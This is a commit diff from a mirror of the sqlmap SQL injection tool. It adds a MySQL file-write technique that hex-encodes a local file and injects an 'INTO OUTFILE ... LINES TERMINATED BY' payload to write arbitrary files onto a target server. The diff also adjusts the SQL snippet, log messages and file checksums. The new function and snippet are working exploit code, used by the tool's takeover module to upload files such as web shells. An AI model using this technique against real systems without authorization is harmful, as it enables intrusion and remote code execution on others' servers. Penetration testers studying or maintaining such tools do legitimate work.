mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2024-11-25 02:53:46 +03:00
Implementation for an Issue #647
This commit is contained in:
parent
349e9b9fa5
commit
c37014b8e8
|
@ -19,7 +19,7 @@ from lib.core.enums import DBMS_DIRECTORY_NAME
|
||||||
from lib.core.enums import OS
|
from lib.core.enums import OS
|
||||||
|
|
||||||
# sqlmap version (<major>.<minor>.<month>.<monthly commit>)
|
# sqlmap version (<major>.<minor>.<month>.<monthly commit>)
|
||||||
VERSION = "1.2.9.8"
|
VERSION = "1.2.9.9"
|
||||||
TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
|
TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
|
||||||
TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
|
TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
|
||||||
VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
|
VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
|
||||||
|
|
|
@ -146,8 +146,7 @@ class Web:
|
||||||
query += "OR %d=%d " % (randInt, randInt)
|
query += "OR %d=%d " % (randInt, randInt)
|
||||||
|
|
||||||
query += getSQLSnippet(DBMS.MYSQL, "write_file_limit", OUTFILE=outFile, HEXSTRING=hexencode(uplQuery, conf.encoding))
|
query += getSQLSnippet(DBMS.MYSQL, "write_file_limit", OUTFILE=outFile, HEXSTRING=hexencode(uplQuery, conf.encoding))
|
||||||
query = agent.prefixQuery(query)
|
query = agent.prefixQuery(query) # Note: No need for suffix as 'write_file_limit' already ends with comment (required)
|
||||||
query = agent.suffixQuery(query)
|
|
||||||
payload = agent.payload(newValue=query)
|
payload = agent.payload(newValue=query)
|
||||||
page = Request.queryPage(payload)
|
page = Request.queryPage(payload)
|
||||||
|
|
||||||
|
|
|
@ -5,6 +5,8 @@ Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'LICENSE' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
from lib.core.agent import agent
|
||||||
|
from lib.core.common import getSQLSnippet
|
||||||
from lib.core.common import isNumPosStrValue
|
from lib.core.common import isNumPosStrValue
|
||||||
from lib.core.common import isTechniqueAvailable
|
from lib.core.common import isTechniqueAvailable
|
||||||
from lib.core.common import popValue
|
from lib.core.common import popValue
|
||||||
|
@ -16,11 +18,13 @@ from lib.core.data import kb
|
||||||
from lib.core.data import logger
|
from lib.core.data import logger
|
||||||
from lib.core.decorators import stackedmethod
|
from lib.core.decorators import stackedmethod
|
||||||
from lib.core.enums import CHARSET_TYPE
|
from lib.core.enums import CHARSET_TYPE
|
||||||
|
from lib.core.enums import DBMS
|
||||||
from lib.core.enums import EXPECTED
|
from lib.core.enums import EXPECTED
|
||||||
from lib.core.enums import PAYLOAD
|
from lib.core.enums import PAYLOAD
|
||||||
from lib.core.enums import PLACE
|
from lib.core.enums import PLACE
|
||||||
from lib.core.exception import SqlmapNoneDataException
|
from lib.core.exception import SqlmapNoneDataException
|
||||||
from lib.request import inject
|
from lib.request import inject
|
||||||
|
from lib.request.connect import Connect as Request
|
||||||
from lib.techniques.union.use import unionUse
|
from lib.techniques.union.use import unionUse
|
||||||
from plugins.generic.filesystem import Filesystem as GenericFilesystem
|
from plugins.generic.filesystem import Filesystem as GenericFilesystem
|
||||||
|
|
||||||
|
@ -112,6 +116,34 @@ class Filesystem(GenericFilesystem):
|
||||||
|
|
||||||
return self.askCheckWrittenFile(wFile, dFile, forceCheck)
|
return self.askCheckWrittenFile(wFile, dFile, forceCheck)
|
||||||
|
|
||||||
|
def linesTerminatedWriteFile(self, wFile, dFile, fileType, forceCheck=False):
|
||||||
|
logger.debug("encoding file to its hexadecimal string value")
|
||||||
|
|
||||||
|
fcEncodedList = self.fileEncode(wFile, "hex", True)
|
||||||
|
fcEncodedStr = fcEncodedList[0][2:]
|
||||||
|
fcEncodedStrLen = len(fcEncodedStr)
|
||||||
|
|
||||||
|
if kb.injection.place == PLACE.GET and fcEncodedStrLen > 8000:
|
||||||
|
warnMsg = "the injection is on a GET parameter and the file "
|
||||||
|
warnMsg += "to be written hexadecimal value is %d " % fcEncodedStrLen
|
||||||
|
warnMsg += "bytes, this might cause errors in the file "
|
||||||
|
warnMsg += "writing process"
|
||||||
|
logger.warn(warnMsg)
|
||||||
|
|
||||||
|
debugMsg = "exporting the %s file content to file '%s'" % (fileType, dFile)
|
||||||
|
logger.debug(debugMsg)
|
||||||
|
|
||||||
|
query = getSQLSnippet(DBMS.MYSQL, "write_file_limit", OUTFILE=dFile, HEXSTRING=fcEncodedStr)
|
||||||
|
query = agent.prefixQuery(query) # Note: No need for suffix as 'write_file_limit' already ends with comment (required)
|
||||||
|
payload = agent.payload(newValue=query)
|
||||||
|
page = Request.queryPage(payload)
|
||||||
|
|
||||||
|
warnMsg = "expect junk characters inside the "
|
||||||
|
warnMsg += "file as a leftover from original query"
|
||||||
|
singleTimeWarnMessage(warnMsg)
|
||||||
|
|
||||||
|
return self.askCheckWrittenFile(wFile, dFile, forceCheck)
|
||||||
|
|
||||||
def stackedWriteFile(self, wFile, dFile, fileType, forceCheck=False):
|
def stackedWriteFile(self, wFile, dFile, fileType, forceCheck=False):
|
||||||
debugMsg = "creating a support table to write the hexadecimal "
|
debugMsg = "creating a support table to write the hexadecimal "
|
||||||
debugMsg += "encoded file to"
|
debugMsg += "encoded file to"
|
||||||
|
|
|
@ -284,17 +284,23 @@ class Filesystem:
|
||||||
if conf.direct or isStackingAvailable():
|
if conf.direct or isStackingAvailable():
|
||||||
if isStackingAvailable():
|
if isStackingAvailable():
|
||||||
debugMsg = "going to upload the file '%s' with " % fileType
|
debugMsg = "going to upload the file '%s' with " % fileType
|
||||||
debugMsg += "stacked query SQL injection technique"
|
debugMsg += "stacked query technique"
|
||||||
logger.debug(debugMsg)
|
logger.debug(debugMsg)
|
||||||
|
|
||||||
written = self.stackedWriteFile(localFile, remoteFile, fileType, forceCheck)
|
written = self.stackedWriteFile(localFile, remoteFile, fileType, forceCheck)
|
||||||
self.cleanup(onlyFileTbl=True)
|
self.cleanup(onlyFileTbl=True)
|
||||||
elif isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION) and Backend.isDbms(DBMS.MYSQL):
|
elif isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION) and Backend.isDbms(DBMS.MYSQL):
|
||||||
debugMsg = "going to upload the file '%s' with " % fileType
|
debugMsg = "going to upload the file '%s' with " % fileType
|
||||||
debugMsg += "UNION query SQL injection technique"
|
debugMsg += "UNION query technique"
|
||||||
logger.debug(debugMsg)
|
logger.debug(debugMsg)
|
||||||
|
|
||||||
written = self.unionWriteFile(localFile, remoteFile, fileType, forceCheck)
|
written = self.unionWriteFile(localFile, remoteFile, fileType, forceCheck)
|
||||||
|
elif Backend.isDbms(DBMS.MYSQL):
|
||||||
|
debugMsg = "going to upload the file '%s' with " % fileType
|
||||||
|
debugMsg += "LINES TERMINATED BY technique"
|
||||||
|
logger.debug(debugMsg)
|
||||||
|
|
||||||
|
written = self.linesTerminatedWriteFile(localFile, remoteFile, fileType, forceCheck)
|
||||||
else:
|
else:
|
||||||
errMsg = "none of the SQL injection techniques detected can "
|
errMsg = "none of the SQL injection techniques detected can "
|
||||||
errMsg += "be used to write files to the underlying file "
|
errMsg += "be used to write files to the underlying file "
|
||||||
|
|
|
@ -1 +1 @@
|
||||||
LIMIT 0,1 INTO OUTFILE '%OUTFILE%' LINES TERMINATED BY 0x%HEXSTRING%--
|
LIMIT 0,1 INTO OUTFILE '%OUTFILE%' LINES TERMINATED BY 0x%HEXSTRING%-- -
|
||||||
|
|
|
@ -50,7 +50,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py
|
||||||
0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py
|
0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py
|
||||||
a7db43859b61569b601b97f187dd31c5 lib/core/revision.py
|
a7db43859b61569b601b97f187dd31c5 lib/core/revision.py
|
||||||
fcb74fcc9577523524659ec49e2e964b lib/core/session.py
|
fcb74fcc9577523524659ec49e2e964b lib/core/session.py
|
||||||
8e0191efaa0a5d6a64a8e4e0aa772164 lib/core/settings.py
|
c762da4ab30d1e245ca359df355ff7a7 lib/core/settings.py
|
||||||
dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py
|
dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py
|
||||||
a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py
|
a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py
|
||||||
815d1cf27f0f8738d81531e73149867d lib/core/target.py
|
815d1cf27f0f8738d81531e73149867d lib/core/target.py
|
||||||
|
@ -89,7 +89,7 @@ acc1db3667bf910b809eb279b60595eb lib/takeover/icmpsh.py
|
||||||
46ff5840b29531412bcaa05dac190413 lib/takeover/metasploit.py
|
46ff5840b29531412bcaa05dac190413 lib/takeover/metasploit.py
|
||||||
fb9e34d558293b5d6b9727f440712886 lib/takeover/registry.py
|
fb9e34d558293b5d6b9727f440712886 lib/takeover/registry.py
|
||||||
6a49f359b922df0247eb236126596336 lib/takeover/udf.py
|
6a49f359b922df0247eb236126596336 lib/takeover/udf.py
|
||||||
f6f835e4190a55e42d13c1e7ca3f728f lib/takeover/web.py
|
a3d07df8a780c668a11f06be42014cdc lib/takeover/web.py
|
||||||
debc36a3ff80ba915aeeee69b21a8ddc lib/takeover/xp_cmdshell.py
|
debc36a3ff80ba915aeeee69b21a8ddc lib/takeover/xp_cmdshell.py
|
||||||
db208ab47de010836c6bf044e2357861 lib/techniques/blind/inference.py
|
db208ab47de010836c6bf044e2357861 lib/techniques/blind/inference.py
|
||||||
1e5532ede194ac9c083891c2f02bca93 lib/techniques/blind/__init__.py
|
1e5532ede194ac9c083891c2f02bca93 lib/techniques/blind/__init__.py
|
||||||
|
@ -172,7 +172,7 @@ f25c50a95e5390ecd32be5a011637349 plugins/dbms/mssqlserver/__init__.py
|
||||||
3c0845fa526e1bb7bbe636fcfcbcc4a6 plugins/dbms/mssqlserver/takeover.py
|
3c0845fa526e1bb7bbe636fcfcbcc4a6 plugins/dbms/mssqlserver/takeover.py
|
||||||
11a5724fdc0b0c0eb2626d952cda216a plugins/dbms/mysql/connector.py
|
11a5724fdc0b0c0eb2626d952cda216a plugins/dbms/mysql/connector.py
|
||||||
445164daf59b890aeacc968af58fcb53 plugins/dbms/mysql/enumeration.py
|
445164daf59b890aeacc968af58fcb53 plugins/dbms/mysql/enumeration.py
|
||||||
4578fa29f04d0a75499f9668466ded07 plugins/dbms/mysql/filesystem.py
|
2f97535b5cfb28eac0d51bf67a0304f7 plugins/dbms/mysql/filesystem.py
|
||||||
34d951003dca386719c4d91384d2669a plugins/dbms/mysql/fingerprint.py
|
34d951003dca386719c4d91384d2669a plugins/dbms/mysql/fingerprint.py
|
||||||
30065993f8300994e4658634121609e9 plugins/dbms/mysql/__init__.py
|
30065993f8300994e4658634121609e9 plugins/dbms/mysql/__init__.py
|
||||||
0e2adbee217f5b94dcc124d24b8dde99 plugins/dbms/mysql/syntax.py
|
0e2adbee217f5b94dcc124d24b8dde99 plugins/dbms/mysql/syntax.py
|
||||||
|
@ -210,7 +210,7 @@ ce6a6ff713852b5eca7b78316cc941c4 plugins/generic/custom.py
|
||||||
78813e60e7108f78ef1af46d360f41bf plugins/generic/databases.py
|
78813e60e7108f78ef1af46d360f41bf plugins/generic/databases.py
|
||||||
4e2b366bb9cfdaaed719b219913357c6 plugins/generic/entries.py
|
4e2b366bb9cfdaaed719b219913357c6 plugins/generic/entries.py
|
||||||
d82f2c78c1d4d7c6487e94fd3a68a908 plugins/generic/enumeration.py
|
d82f2c78c1d4d7c6487e94fd3a68a908 plugins/generic/enumeration.py
|
||||||
0c8abe66a78edca0660bfb8049d109e2 plugins/generic/filesystem.py
|
0a67b8b46f69df7cfacc286b47a0d9a5 plugins/generic/filesystem.py
|
||||||
f5d5419efddfe04648ea5e953c650793 plugins/generic/fingerprint.py
|
f5d5419efddfe04648ea5e953c650793 plugins/generic/fingerprint.py
|
||||||
1e5532ede194ac9c083891c2f02bca93 plugins/generic/__init__.py
|
1e5532ede194ac9c083891c2f02bca93 plugins/generic/__init__.py
|
||||||
f7874230e5661910d5fd21544c7d1022 plugins/generic/misc.py
|
f7874230e5661910d5fd21544c7d1022 plugins/generic/misc.py
|
||||||
|
|
Loading…
Reference in New Issue
Block a user